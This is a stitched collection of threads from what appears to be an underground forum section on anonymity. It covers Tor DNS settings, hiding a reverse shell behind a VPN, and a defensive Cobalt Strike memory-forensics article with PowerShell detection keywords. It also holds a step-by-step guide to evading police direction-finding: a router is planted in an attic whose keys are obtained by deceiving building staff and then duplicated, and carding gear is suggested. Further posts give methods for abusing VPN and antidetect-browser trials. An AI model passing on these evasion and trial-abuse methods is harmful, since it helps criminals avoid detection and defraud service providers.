Другая атака связана с выдачей уникального IPv6 каждому посетителю сайта, благодаря чему можно связывать между собой разные цепочки Tor, инициированные одним и тем же пользователем. Однако, возможность применения этой атаки ограничена, потому кнопка "New identity" (Новая личность) чистит любой кэш, а простая смена цепочки не чистит ничего, поэтому может оставить и другие следы. Но всё же, в определённых условиях эта атака может сработать, эта проблема указана разработчиками Tor и её тоже нужно принять во внимание.

Ещё не тотальный деанон, но уже нарушение конфиденциальности и неприятное "пособничество" злоумышленнику на выходной ноде.

Изначально кэш DNS сделали для повышения производительности, но вреда от этой функции сейчас больше, чем пользы.
В разлычных статьях иногда встречаются заготовленные конфигурации torrc, в которых эта опция включена. Если вы не копировали в свою систему что попало и не пытались улучшить Tor (опять), то всё должно быть нормально.
Но всё равно проверим, хотя бы из любопытства.

Каких опций быть не должно: CacheDNS, CacheIPv4DNS, CacheIPv6DNS, UseDNSCache, UseIPv4Cache, UseIPv6Cache
Команда для проверки (выполнять лучше от вашего стандартного пользователя, а не root):

Bash:Copy to clipboard

sudo egrep -inR --color 'DNSCache|CacheDNS|CacheIPv.DNS|UseIPv.Cache' /etc/tor/tor* /etc/torrc.d/ /usr/local/etc/torrc.d/ ~/.torrc*

Можно запустить как на host-os, так и на Whonix Gateway.
Команда должна выдать пустой результат (No such file or directory можно игнорировать). Если совпадения были найдены, их нужно удалить из файлов. Удалять нужно не всю строку, а только те слова, что перечислены выше. Вот так (зелёное оставить, красное удалить):
SocksPort 9051****CacheDNS UseDNSCache

Tor-Browser проверять нет необходимости, его вряд ли кто-то настраивает через конфиги, поскольку его конфиги перезаписываются при перезапусках и обновлениях, произвольные модификации там не приживаются.

Spoiler: Для интересующихся, параноиков и интересующихся параноиков

PATH_TO_TOR_BROWSER_DIR - путь к папке с браузером Tor.

Bash:Copy to clipboard

sudo egrep -inR --color 'DNSCache|CacheDNS|CacheIPv.DNS|UseIPv.Cache' PATH_TO_TOR_BROWSER_DIR/Browser/TorBrowser/Data/

Использование Firefox на Whonix лучше максимально сократить. Для создания новой личности в Firefox на Whonix нужно полностью очистить браузер, закрыть его, перезапустить Tor кнопкой Restart Tor на Gateway и только после этого открыть браузер снова.

Нам врёт документация Tor.
В некоторых мануалах в интернете вы можете обнаружить такую строчку:
CacheIPv4DNS- Tells the client to remember IPv4 DNS answers we receive from exit nodes via this connection.(On by default.)
Опасная для конфиденциальности опция по-умолчанию включёна???
Это действительно было написано в документации, но это не правда. Разработчики Tor выключили эту настройку ещё в начале 2015 года, но забыли отредактировать мануал. Спустя аж 4 года вспомнили и исправили ошибку, о чём свидетельствует этот коммит: https://gitlab.torproject.org/dgoulet/tor/-/commit/b979415e8bf4c33e6d540c780edeeb40bce5e512. Но на многих сайтах до сих пор лежит старая версия мануала с ошибкой. Знайте, что в реальности все эти опции Off by default.

Хорошо, вы убедились в том, что DNS работает правильно и не вредит вашей анонимности.
Но ведь он по-прежнему никак не защищён.
Да и хрен с ним!

Если бы защита DNS внутри Tor была возможна, то она была бы бесполезна. Дело в том, что DNS следует рассматривать как вспомогательную технологию. Он лишь помогает быстро найти нужный сервер. А за соответствие домена и сервера отвечают совсем другие механизмы, на которые и нужно обратить внимание.

Кстати. По итогу статьи получается, что наибольший вред анонимности приносят не особенности Tor, а наши собственные неправильные действия. Забегая вперёд скажу, что и у следующей статьи итог будет примерно такой же. Забавно, не находите?

И вот только теперь, когда мы не вредим сами себе, можно добавить для этого злоумышленника. Обратимся к классике. Негодяй Bob поднял выходную ноду Tor и предпринимает попытки атаковать Alice, чтобы завладеть её данными, деньгами, а может и самой Alice. Рассмотрим ситуацию с обеих позиций, чтобы понять как распознать возможную атаку и увернуться от неё.

Анонимное сканирование

ID: 676533bbb4103b69df371aa1
Thread ID: 74964
Created: 2022-10-31T11:53:39+0000
Last Post: 2022-10-31T12:31:09+0000
Author: Jake
Replies: 2 Views: 251

Обычно использую ВПН+whonix+vpn для нетребовательных процессов.
А сейчас надо отсканить ресурс виртуалка не тянет сканер.
Основная машина Windows 11 21h2
Что можно сделать?
Возможно дабл ВПН или ВПН+Тор+ ВПН, но все на одной машине
Если можно это реализовать, то подскажите)

Best, Free and Trusted Anonymous Crypto Wallets

ID: 676533bbb4103b69df371ac4
Thread ID: 72462
Created: 2022-08-30T21:28:01+0000
Last Post: 2022-08-31T11:09:34+0000
Author: Dreaded Launch
Replies: 6 Views: 250

Anyone able to link me to any Free and trusted/reliable crypto wallets, Just to help stay anonymous while buying/selling?

Нужна помощь для анонимного подключения к VPN

ID: 676533bbb4103b69df371b05
Thread ID: 67982
Created: 2022-06-01T11:42:00+0000
Last Post: 2022-06-10T00:49:01+0000
Author: c0cker
Replies: 1 Views: 249

Привет Я нашел следующую пасту (https://pastebin.com/rPt19xhy), которая содержит сертификат VPN для создания соединения с 13.40.228.220. Как я могу получить доступ к этой VPN анонимно?

переброс траффика metasploit через vpn

ID: 676533bbb4103b69df371a9d
Thread ID: 75100
Created: 2022-11-02T14:56:59+0000
Last Post: 2022-11-03T19:09:33+0000
Author: sect adept
Replies: 5 Views: 248

Здравствуйте. Подскажите, пожалуйста, как сделать так, чтобы при установке reverse шелла в метасплоите я указывал не белый айпишник своего сервера, а сервера ВПН. То есть чтобы траффик реверс шелла шел через ВПН и мой белый айпишник не светился?

ОС WarTech Cr1me

ID: 676533bbb4103b69df371b0d
Thread ID: 67396
Created: 2022-05-20T12:41:51+0000
Last Post: 2022-05-24T12:11:10+0000
Author: HiddenLand
Replies: 1 Views: 248

Покупать не собираюсь,все равно не продадут( даже за 0.5 битка )

Есть ли у кого данная операционка и в чем ее принципиальное преимущество над условным Whonix'ом?Она и вправду настолько мощная,как о ней пишут?

Выскочить за пределы соты в которой фактически находитесь

ID: 676533bbb4103b69df371a17
Thread ID: 97043
Created: 2023-09-01T08:50:00+0000
Last Post: 2023-09-01T09:21:31+0000
Author: Knew100
Prefix: Статья
Replies: 1 Views: 246

А что же сделать с пеленгацией?
Здесь на помощь придут браться тайваньцы из компании D-link с их роутером Dir-320,в котором есть возможность раздавать интеренет с 3g модемов(подключенных к usb роутера) по Wi-Fi

Ну что,догадываетесь в чем дело? Еще нет?

Т.е получив доступ на чердак/крышу/квартиру в любом месте,где есть прием 3g
Устанавливаете роутер,настраиваете и наслаждаетесь интернетом.
Так ,скажете вы, но все равно безопасность сомнительная, ведь радиус действия Wi-Fi совсем небольшой.
Вот здесь нам и прийдет на помощь направленная Wi-Fi антена (погуглите-в интернете огромное кол-во рецептов по изготовлению или же купите/скардите для себя) при помощи которой при прямых руках и должном опыте сможете находиться до 2-10 км от вашего роутера с 3g модемом.

В общем подробная инструкция:
Что потребуется: 3g модем,симка,роутер (В моем случае D-link Dir-320,так как показал себя довольно хорошо и легок в настройке)
Сам план:
1)Перешиваем и настраиваем роутер оффициальной прошивкой с поддержкой 3g (легко находиться в гугле,сейчас лень искать)
3)Ищем чердак/крышу и получаем туда доступ.
Получить доступ на них на самом деле просто.Вот один из вариантов:
Приходим в ЖЭК,улыбаемся,одариваем комплиментами местны контингент и просим дать нам ключи от чердака для того чтобы поправить/установить спутниковую параболическую антену(в простонардоье-тарелка).
Очень желательно сделать дубликат, чтобы в случае чего всегда иметь доступ.
3)Пробираемся на чердак, желательно прихватив ноутбук, устанавливаем роутер
Проверяем раздачу интернета.Если все в порядке,то действуем дальше.
4)(Если необходимо)Рассчитываем/подбираем методом тыка место установки предварительно изготовленной антены для роутера, после чего закрепляем ее, подключаем к роутеру и просим товарища либо сами проверяем коннект на месте дислокации(т.е там,где будете работать).
5)Желательно взять любой ИБПшник, чтобы сберечь бп роутера(который часто страдает от скачков напряжения) и металлический ящик подходящего размера,куда все аккуаратно складываем,желательно прокладывая поролоном(далеко не обязательно,но чтобы зимой не мучиться лучше сделать) и закрепляем в нужном месте.
Еще раз проверяем коннект и закрываем чердак.
Все,теперь можете спать чуть спокойнее,так как даже в случае пеленгации выйдут на чердак,где в худшем случае найдут только роутер и модем.
P.S Понятно,что это далеко не панацея,но для тех кто пользуется 3g лишний способ обезопасить себя.
Удачи на невидимом фронте!
Для Йоты есть аналог,Yota Egg-раздает Yota интернет через Wi-Fi

FREE ANONYMOUS FILE SHARING | NO USAGE LIMIT

ID: 676533bbb4103b69df3719ea
Thread ID: 102091
Created: 2023-11-11T20:48:28+0000
Last Post: 2023-11-11T20:48:28+0000
Author: TCG
Prefix: Мануал/Книга
Replies: 0 Views: 245

1. Download & Install https://onionshare.org
2. Press Connect with TOR Button
3. Drag & Drop all Files you want to upload in the field
4. Wait some time
5. You'll get an .onion url aswell as an private key.
6. Provide User's with the link and the Provate key aswell as the download link for the tor browser.

Note, after you shared the File, you can stop file sharing at any time within OnionShare Application. This is useful if you for example want only 1 person to download it or if your link and private key got exposed to Users who shouldn't be able to download it.

Only limitation is your network speed, no file upload limit whatsoever!

Credits LeakedPrivate on telegram

HiddenVM, обсуждение

ID: 676533bbb4103b69df3719ca
Thread ID: 105516
Created: 2024-01-10T19:47:04+0000
Last Post: 2024-01-11T10:54:20+0000
Author: Android_2025
Replies: 1 Views: 245

У кого-то есть опыт использования HiddenVM под TAILS? Безопасно ли ее использовать?

доступные onion email-сервисы

ID: 676533bbb4103b69df371bab
Thread ID: 56345
Created: 2021-09-06T15:33:49+0000
Last Post: 2021-09-06T15:33:49+0000
Author: CmdCd
Replies: 0 Views: 243

У кого нибудь есть список самых лучших(работающий)почтовых сервисов в Tor?

[Method] Get unlimited Express VPN for free

ID: 676533bbb4103b69df371b87
Thread ID: 58308
Created: 2021-10-29T06:45:15+0000
Last Post: 2021-10-29T06:45:15+0000
Author: estermog
Replies: 0 Views: 243

[Method] Get unlimited Express VPN for free

Hi folks, if you need to VPN for mobile phone i'll be share a method for getting free account. Follow the below steps, respectively.
1. Install the Parallel Space app from Play Store.
2. Install the Express VPN.
3. With clonning in Parallel Space, start 7-day trial version.
4. Then, enter the actual Express VPN app and follow "Forgot Password" instructions.
5. Finally, you will receive a recovery email to entered email for sign up. Now you have a password.
6. Copy the password and login to VPN. Until free trial period have completed you can use. When it expired, repeat the mentioned steps above.

Please leave a like, respect the effort given.

Memory Forensics: Hunting Cobalt Strike in Memory

ID: 676533bbb4103b69df371996
Thread ID: 110163
Created: 2024-03-11T11:04:23+0000
Last Post: 2024-03-14T15:07:09+0000
Author: defaultuser0
Prefix: Статья
Replies: 0 Views: 242

Nearly every major intrusion or compromise involves Cobalt Strike in one way or another. To name a few, HAFNIUM attack, SolarWinds breach, and many Ransomware attacks are good examples of using cobalt Strike. Picking Cobalt Strike as our subject was a natural choice, given that every Advanced Persistent Threat (APT) group uses Cobalt Strike in their Arsenal & toolkit. Threat Reports from MITRE Attack, CrowdStrike Threat Report, Microsoft, Talos and others show clear evidence that APT are using Cobalt Strike heavily. Cobalt Strike is an Adversary Simulation & Red Team operation suite, with very advanced capabilities. Cobalt Strike is heavily used because it includes everything an attacker dreams of, Stable platform, extremely customizable and designed to support long term exploitation at a very large scale.

As Creator of Cobalt Strike Raphael Mudge says:

" A traditional Antivirus product might look at my payload when I touch disk or load content in a browser. If I defeat that, I win. Not so today! Now the battleground is the functions we use to get our payload in memory."

As Raphael Mudge mentioned earlier, Cobalt Strike primarily operates in memory when its initial loader is executed. This style of execution poses a challenge for security defenders for Cobalt Strike Detection. This is also a challenge for many security products as scanning memory is not easy. For this reason, we see a growing need for End Point Detection & Response EDR technologies because of its ability to scan memory in real time and the ability to detect such activities and behaviors.

The concept that memory serves as the last battleground in the fight against attackers is indeed accurate. It is accurate because, as we understand, code must be executed somewhere, and attackers are continually improving their methods to evade security controls, and detecting has become a daunting task. failing to identify attackers in this final area, memory, essentially means losing not the battle but the war. In this article, we will delve into techniques employed by Cobalt Strike, especially in memory. The article will shed light on what makes Cobalt Strike! Cobalt Strike.

Memory Forensics: How I met your Beacon?

In the world of forensics, following a structured approach is essential, and memory forensics is no exception here. As a Digital Forensics and Incident response (DFIR) analyst, you need a starting point for your investigation. The same holds true for memory forensics – you require a clear reason or lead to delve deeper into your analysis. Without this initial direction, going directly to memory forensics is just like looking for a needle in a haystack – a challenging, time and effort consuming task. This pivot point serves a guiding light for analysts, leading them through the journey of uncovering critical evidence. This emphasizes on the necessity of systemic methodology for detecting malicious activities hidden in memory.

Before digging deep into memory analysis, searching for Cobalt Strike can be a difficult task, there are tools that can help speed up the process and spot Cobalt Strike. This can save a lot of time compared to sifting through memory dumps and examining processes to find your starting point. Even though it is possible and doable to choose the second approach and dive deep into memory analysis without running the tools, since Cobalt Strike has some signatures and behaviors that can be detected in memory. Our approach is to use the tools available to confirm the presence of Cobalt Strike and then move to the second approach to manually inspect and analyze the memory dumps. Detecting Cobalt Strike can be achieved by keeping an eye out for the following:

1- Process list – Pslist module: to list all processes.

2- Process Tree – Pstree module: to find Parent-Child relationship between process.

3- DLL List – dlllist: to list DLLs associated with process.

4- Malicious code – Malfind: to find hidden injected code/DLLs based on some characteristics such as VADs Tags: Virtual Address Descriptors and page permissions. These characteristics can be summarized as the following:

a. What are the Page Permissions? Read_WriteExecute

b. Is the Memory section backed with file on disk?

c. Does the Memory section contain code?

5- Handles – handles: handles are pointers to an object in windows.

6- Named pipes can be found using handles command in volatility framework.

7- Command line – CmdLine: used to find the command line started the process.

8- Process Scan – Psscan: to display inactive and hidden processes that can be used by malware.

9- Cmd Scan – CmdScan: this module is used to search memory for commands the attackers used on the compromised system. Note that this plugin shows the most recent 50 commands by inspecting a structure called "COMMAND_HISTORY ".

As stated above, first let's confirm the presence of Cobalt Strike in our memory image and then move toward analyzing it using Volatility framework. One of the favorite tools I use is a tool written by Didier Stevens, 1768.py: https://didierstevens.com/files/software/1768_v0_0_18.zip

The tool is straightforward to use; you can initiate it by simply providing the relevant memory image as input:

As clearly seen from the screenshot above, the tool proves its value by not only detecting the presence of Cobalt Strike but also delving deeper to uncover essential configurations of the beacon. It provides insights such as the C2 Payload, the port in use, SleepTime, C2 domain, and other valuable details that are pivotal in scoping the network and identifying other potentially compromised systems. Additionally, the tool stands out in identifying the sacrificial processes employed by the beacon, supplying analysts with critical information. This becomes particularly valuable when dealing with extensive networks, simplifying the investigation process significantly. The tool exceeds expectations, even guessing the Cobalt Strike version:

Important Note: "Sacrificial processes" refers to the practice of utilization of a process on a compromised system to execute malicious code. It's essential to be aware that Cobalt Strike's default configuration employs rundll32.exe for this purpose. However, it's crucial for DFIR analysts to recognize that this default configuration can be modified, potentially leading Cobalt Strike to employ alternative processes like svchost.exe. As mentioned previously, Cobalt Strike offers extensive customizability, aligning with the thoughts of Raphael Mudge, the creator of Cobalt Strike:

" So, why rundll32.exe? Why not something else? Honestly, it doesn't matter what I pick. Anything I pick is now the default. Because people rarely change defaults, it will show up enough that someone will notice. The right thing here, for all parties, is to know how to change the defaults. Fortunately, this isn't too hard to do."

Although defaults are commonly used, it's important to stay alert to non- default configurations for effective detection.

Forensicating the memory image:

Now that we are sure Cobalt Strike is on our Compromised system, we can now get to manually check the memory image to find evil and gather evidence & IOCs needed. We will use the Volatility Framework. If we had started by looking at the image, we'd spend a lot of time digging through processes, DLLs, and using various plugins to hunt for Cobalt Strike. But since we already know it's hiding in one of the active processes, as we saw earlier, we'll focus on inspecting that process: rundll32.exe.

A quick review of Volatility's process tree output reveals numerous abnormalities, with processes like WmiPrivSE spawning PowerShell, and PowerShell subsequently spawning another PowerShell. Most notably, we observe PowerShell.exe spawning multiple rundll32.exe. These unusual patterns strongly suggest a need for a thorough examination of rundll32.exe, as its behavior appears potentially malicious.

First, we'll examine the DLLs of that process using the Volatility plugin (dlllist):

Interestingly, there's something unusual here. Rundll32.exe is supposed to load DLLs, but from the command line, we don't see any evidence of DLL loading, arguments, or any activity at all.

Revisiting the parent-child relationship to uncover the command line used for these processes, we can easily identify the presence of "syswow64." To achieve this, we'll use the cmdline plugin in Volatility.

What we observe here is the execution of code from SYSWOW64, indicating the use of 32-bit code—a deviation from the usual scenario where it typically runs from system32, signifying 64-bit code. Interestingly, in modern systems, the system32 folder houses 64-bit code, while 32-bit code operates from SYSWOW64. To add to the complexity, you might wonder who still utilizes 32-bit code and why. Many malware frameworks prefer 32-bit code due to its compatibility—it works smoothly on both 32-bit and 64-bit systems. When PowerShell runs from a 32-bit version, it operates from SYSWOW64, a rare and suspicious activity on a system.

Finding the juicy Beacon - Injected Beacon:

This section highlights what distinguishes Cobalt Strike from other C2 frameworks. It operates stealthily, employing advanced injection techniques and tactics to evade detection & Anti-memory forensics techniques. To uncover injected code, Volatility offers a dedicated plugin called "MalFind," as mentioned earlier. MalFind's method involves several steps to uncover injection:

1- Examining the memory page permissions linked to the process.

a. Each memory page has permissions (Read, Write, Execute).

2- Evaluating whether the memory section is linked to a file on disk or not.

3- Verifying whether the memory section contains code.

When we execute Malfind on our target process, rundll32.exe, we observe that it meets two of the three conditions mentioned above.

Indeed, Malfind detects a suspicious memory section with permissions set to Read_Write_Execute, and it's not associated with a file originating from the disk. In Windows, all legitimate code is sourced from the disk. The final check involves inspecting the memory section to determine if it contains code. However, as indicated by the Volatility results, no code is obvious within the hex data.

Why isn 't there any code present? There are two primary reasons. First , Malfind only reveals the initial 64 bytes of the memory page, which is, in fact, 4096 bytes in size. Second , this relates to a classic defense tactic employed by Cobalt Strike known as Anti-Memory Forensics. Cobalt Strike utilizes a technique called Portable Executable Header Stomping. Once the malicious code is operational, the PE header becomes unnecessary. To avoid detection, Cobalt Strike overwrites the first 4096 bytes with zeros, effectively erasing any traces of the PE header, as explained in the Cobalt Strike user guide.

In this scenario, we can address this by dumping the entire process and conducting a more thorough analysis. To achieve this, we will utilize the memdump plugin, which allows us to dump the entire process into a .dmp file for further examination.

At this stage, a basic string search within the dump file can provide valuable insights. This method can offer us the same information we initially obtained using the 1768.py tool to detect the presence of Cobalt Strike.

At this point, as a DFIR analyst, your primary tasks are nearly complete. If additional analysis is deemed necessary, it's recommended to pass the dump file to your Malware Analyst or Reverse Engineers team for in-depth examination.

Throughout this analysis, we've successfully detected the presence of Cobalt Strike. The information we've uncovered is sufficient for scoping the environment and identifying additional compromised systems. It's worth noting that YARA rules serve as an excellent method for scanning the environment for in-memory IOCs. Numerous publicly available YARA signatures can be employed, or you can create your custom YARA rules to scan for any Cobalt Strike signatures. A valuable starting point and an excellent example of YARA Signature is the "apt_leviathan.yar" rule, which can be accessed via the following link: <https://github.com/Neo23x0/signature- base/blob/master/yara/apt_leviathan.yar>

It's essential to keep in mind that Cobalt Strike is highly customizable, and publicly available YARA signatures may differ from what's present in your specific environment. Therefore, crafting YARA rules tailored to your environment's unique characteristics is often the most effective way to identify relevant IOCs.

Other Cobalt Strike Detection techniques:

1- Named Pipes:

The concept that "Malware has to communicate" holds true. Regardless of how stealthy they may be, all malwares must establish some form of communication. Interestingly, many malware frameworks, including Cobalt Strike, utilize Named Pipes for communication. Detecting the presence of named pipes can be achieved through log analysis/Sysmon. Detecting Cobalt Strike through the analysis of named pipes is a distinct and noteworthy topic, as Cobalt Strike creates named pipes in a pattern that can be effectively detected. For further information, please visit: [https://labs.withsecure.com/publica...trike-default-modules- via-named-pipe-analysis](https://labs.withsecure.com/publications/detecting- cobalt-strike-default-modules-via-named-pipe-analysis)

2- PowerShell:

Considering that Cobalt Strike extensively relies on PowerShell, with many of its advanced capabilities utilizing PowerShell scripts, it becomes crucial to emphasize the importance of PowerShell logging. Enabling comprehensive PowerShell logging, including script block logging, is essential for effectively detecting Cobalt Strike activities and behaviors within the environment.

The following keywords outlining some of the PowerShell artifacts that have been observed in association with Cobalt Strike: **DownloadString, EncodedCommand, FromBase64String, rundll32, IEX, Invoke-Expression, WebClient, Syswow64, Powershell -version,http://127.0.0.1 , Reflection, $DoIt, Start- Process, Invoke-WMIMethod, Invoke-Command

Conclusion:**

In conclusion, as a DFIR analyst, memory forensics serves as your final battleground in the fight against threats like Cobalt Strike. We've delved into the tactics employed by attackers utilizing Cobalt Strike and their evasion techniques. Leveraging signature-based detection tools like 1768.py and the Volatility framework, we've successfully unveiled traces of Cobalt Strike within memory. Furthermore, we've uncovered Cobalt Strike's evasion strategies, such as Portable Executable Header Stomping. It's worth noting that the presence of Cobalt Strike can also be detected through named pipes and PowerShell, given its heavy reliance on PowerShell and its utilization of named pipes for communication.

src: cybersync[.]org/blogs-en/hunting_cobalt_strike_in_memory

Антики с промопериодом

ID: 676533bbb4103b69df371a2e
Thread ID: 94888
Created: 2023-08-05T14:05:32+0000
Last Post: 2023-08-05T14:05:32+0000
Author: Knew100
Prefix: Статья
Replies: 0 Views: 242

Dolphin{anty} https://anty.dolphin.ru.com/ru/ - бесплатный на время бета- теста
anty.dolphin.ru.com - 10 профилей, их можно удалять и создавать снова
AdsPower https://www.adspower.net/ - 2 бесплатных отпечатка браузера
AEZAKMI https://ru.aezakmi.run/ - 2 бесплатных отпечатка браузера
MultiLogin https://multilogin.com/ru/ - 10 бесплатных профилей
Incogniton https://incogniton.com/ru/ - 10 бесплатных профилей
Ghost Browser https://ghostbrowser.com/ - ограниченный функционал
xLogin https://xlogin.us/ - абсолютно бесплатный функционал
HydraHeaders https://hydraproxy.com/hydraheaders/ - абсолютно бесплатный функционал
Undetectable https://undetectable.io/ru/ - абсолютно бесплатный функционал на 3 месяца
Sphere https://sphere.tenebris.cc/ - 10 бесплатных профилей
https://gologin.com 7-дневная бесплатная пробная версия его можно абузить просто создав новую почту и зарегав на неё акк
новый аккаунт не нужно подтверждать и можно регать новые скок угодно

Х-браузер https://smartproxy.com/apps/x-browser
Бесплатный вариант для индивидуального использования.
X-Browser имеет уникальный подход. С резидентными прокси Smartproxy вам не нужно платить за это. В результате вам все равно придется платить, но только за прокси-сервис.
X-Browser создан на основе браузера Chrome. Вы не сможете импортировать файлы cookie, синхронизировать свой профиль в облаке или использовать интеграцию с автономным браузером.
Тем не менее, в удобном пользовательском интерфейсе этого инструмента есть все, что вам нужно, чтобы изменить отпечаток пальца вашего браузера. Вы можете создавать неограниченное количество профилей пользователей.
В общем, если вам нужно сотрудничать или вы не планируете использовать прокси Smartproxy, вам вообще не нужно использовать X-Browser. Вы должны дать ему шанс, если можете - и эти резидентные IP-адреса являются одними из лучших доступных.

Операционные системы: Windows, macOS
Цена: Бесплатно

Switch https://mybot.su/Home/Switch
Switch - сервис на основе Chromium для ведения мультиаккаунтов. Интерфейс может показаться недоработанным, однако не стоит забывать, что это полностью бесплатный антидетект браузер. Кроме того, Switch предлагает широкий функционал, где реализованы основные функции: эмуляция WebRTC, подмена отпечатков Canvas, клонирование профилей.

Защита данных и защита от отвязки Google аккаунта похищенного телефона.

ID: 676533bbb4103b69df3719d2
Thread ID: 104060
Created: 2023-12-14T09:20:16+0000
Last Post: 2023-12-14T13:03:56+0000
Author: RestarterMan
Replies: 4 Views: 241

Собственно, почему я эту тему создал. В этом году у меня украли iPhone 13 Pro Max и отвязали Apple ID от телефона за считанные часы, я даже не успел сим карту заблокировать. Вчера наткнулся на новость, что Apple добавит в IOS функцию, что если отвязываешь Apple ID, отключаешь "локатор" и т.п, теперь нужно два подтверждения с помощью Face ID и Touch ID, чтобы отключить эти функции.
[Источник](https://www.wsj.com/tech/personal-tech/apple-iphone-ios-update- stolen-device-protection-698d760e)
Т.к я обратно перешел на телефоны на Android, то собственно встал вопрос, а насколько защищенные ныне Android телефоны от кражи. Сейчас я владелец Samsung Galaxy S23 Ultra, где есть Knox, но насколько он поможет? Путем гуглежа выяснил, что ныне отвязка Google аккаунта делается в "два клика", если верить заявлениям.
Ссылка на волшебную утилитку на 4PDA
Демонстрация на ютубе
Собственно, назревает вопросы.
1. Работает ли данная утилита?
2. Если да, как можно еще защитить телефон на Android от взлома после кражи?
Тема в данном топике рассматривается только в повседневном, гражданском использовании.

через что создавать ssh

ID: 676533bbb4103b69df371abe
Thread ID: 72786
Created: 2022-09-06T11:22:51+0000
Last Post: 2022-09-09T09:13:10+0000
Author: asddddd
Replies: 6 Views: 241

через что создавать ssh? Нашел кряк xshell стоит ли заходить через него. Можно просто из под винды?

Как поставить сайт на сервере ubuntu nginx в торе и рядом в чистом интернете?

ID: 676533bbb4103b69df371a03
Thread ID: 99152
Created: 2023-09-30T21:14:26+0000
Last Post: 2023-09-30T21:14:26+0000
Author: forslll
Replies: 0 Views: 241

Есть сервер ubuntu с nginx, пробывал поставить сайт на сервак в тор, 80й порт открыл и путь рут прописал, файлы в пути var/www/html закинул весь сайт, ключи и домен кинул. Видно было только главный html index файл котрый был первый и единственный в каталоге, остальные пути не было видно. Помимо этого сайт должен обрабатывать php. Не могу разобраться с настройкой конфигов сайта, всего такие конфиги, возможно есть иные:
torcc
enable-site - default
nginx.config

Прошу помочь прописать праильные пути и настройки конфигов кто разбираеться что-.бы php и остальные страницы были видны , и на сервере стоял как тор на 80 так и клир 443 и что для этого нужно

Spoiler: nginx.config

user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;

events {
worker_connections 768;

multi_accept on;

}

http {

Basic Settings

sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;

server_tokens off;

server_names_hash_bucket_size 64;

server_name_in_redirect off;

include /etc/nginx/mime.types;
default_type application/octet-stream;

SSL Settings

ssl_protocols TLSv1 TLSv1.1 TLSv1.2 TLSv1.3; # Dropping SSLv3, ref: POODLE
ssl_prefer_server_ciphers on;

Logging Settings

access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;

Gzip Settings

gzip on;

gzip_vary on;

gzip_proxied any;

gzip_comp_level 6;

gzip_buffers 16 8k;

gzip_http_version 1.1;

gzip_types text/plain text/css application/json application/javascript

text/xml application/xml application/xml+rss text/javascript;

Virtual Host Configs

include /etc/nginx/conf.d/.conf;
include /etc/nginx/sites-enabled/;
}

#mail {

# See sample authentication script at:

# http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript

# auth_http localhost/auth.php;

# pop3_capabilities "TOP" "USER";

# imap_capabilities "IMAP4rev1" "UIDPLUS";

server {

listen localhost:110;

protocol pop3;

proxy on;

}

server {

listen localhost:143;

protocol imap;

proxy on;

}

#}

Spoiler: enable-site - default

You should look at the following URL's in order to grasp a solid

understanding

of Nginx configuration files in order to fully unleash the power of Nginx.

https://www.nginx.com/resources/wiki/start/

https://www.nginx.com/resources/wiki/start/topics/tutorials/config_pitfalls/

https://wiki.debian.org/Nginx/DirectoryStructure

In most cases, administrators will remove this file from sites-enabled/ and

leave it as reference inside of sites-available where it will continue to be

updated by the nginx packaging team.

This file will automatically load configuration files provided by other

applications, such as Drupal or Wordpress. These applications will be made

available underneath a path with that package name, such as /drupal8.

Please see /usr/share/doc/nginx-doc/examples/ for more detailed examples.

Default server configuration

server {
listen 80 default_server;
listen [::]:80 default_server;

SSL configuration

listen 443 ssl default_server;

listen [::]:443 ssl default_server;

Note: You should disable gzip for SSL traffic.

See: https://bugs.debian.org/773332

Read up on ssl_ciphers to ensure a secure configuration.

See: https://bugs.debian.org/765782

Self signed certs generated by the ssl-cert package

Don't use them in a production server!

include snippets/snakeoil.conf;

root /var/www/html;

Add index.php to the list if you are using PHP

index index.html index.htm index.nginx-debian.html;

server_name _;

location / {

First attempt to serve request as file, then

as directory, then fall back to displaying a 404.

try_files $uri $uri/ =404;
}

pass PHP scripts to FastCGI server

#location ~ \.php$ {

include snippets/fastcgi-php.conf;

# With php-fpm (or other unix sockets):

fastcgi_pass unix:/var/run/php/php7.4-fpm.sock;

# With php-cgi (or other tcp sockets):

fastcgi_pass 127.0.0.1:9000;

#}

deny access to .htaccess files, if Apache's document root

concurs with nginx's one

#location ~ /\.ht {

deny all;

#}
}

Virtual Host configuration for example.com

You can move that to a different file under sites-available/ and symlink

that

to sites-enabled/ to enable it.

#server {

listen 80;

listen [::]:80;

server_name example.com;

root /var/www/example.com;

index index.html;

location / {

try_files $uri $uri/ =404;

}

#}

Spoiler: torcc

HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 80 127.0.0.1:80

#HiddenServiceDir /var/lib/tor/other_hidden_service/
#HiddenServicePort 80 127.0.0.1:80
#HiddenServicePort 22 127.0.0.1:22

Размышления о безопасности

ID: 676533bbb4103b69df371b46
Thread ID: 62866
Created: 2022-02-12T14:07:45+0000
Last Post: 2022-02-12T14:20:57+0000
Author: Volt Ghost
Replies: 1 Views: 240

На сколько безопасно устанавливать на телефон мессенджеры и эл. почты, такие как proton, tox, jabber ?

Так же неоднократно слышал, что использовать безопасно - это использовать через Tor.

На сколько это true или false ?

Есть сервис где можно получить беслатный vps?

ID: 676533bbb4103b69df371b0b
Thread ID: 67839
Created: 2022-05-29T17:27:05+0000
Last Post: 2022-05-29T21:01:36+0000
Author: do2om9th
Replies: 4 Views: 239

Напрмер есть демки у крупных сервисов наподобие Google Amazon Microsoft, но у них есть подвох, нужно привязывать свою банковскую карту, но они дают на полгода vps, есть способ подключають через чужие карты но это незаконно. А обычные шарашки пишут что у них есть демка, но со всякими косяками, наприпер положить на счет доллар или писать ображение в поддержку, там много всякой фигни из за чего дему бесплатно не получить

Слив данных через Imgur ref параметр

ID: 676533bbb4103b69df3718e9
Thread ID: 129051
Created: 2024-12-16T11:29:10+0000
Last Post: 2024-12-16T14:04:33+0000
Author: don171
Replies: 1 Views: 235

Всем алоха, у меня тут имгур не прогружался, думаю дай покапаюсь в этих ХТМЛях, мож линк прямой найду. Божечки, там я обнаружил, что вставка имгуровского фрейма добавляет referer к линку картинки.

Теоретически, какой-нибудь агент смит может запросить у имгура инфу по отсылкам к дамаге или любому месту где заэмбедили, запросить инфу когда данный скрин подгружали первый раз и привязать айпишник\отпечаток к конкретному юзеру. Херню сморозил или имеет место быть?

ВПН режет рдп, как лечить?

ID: 676533bbb4103b69df371b10
Thread ID: 67035
Created: 2022-05-15T12:12:34+0000
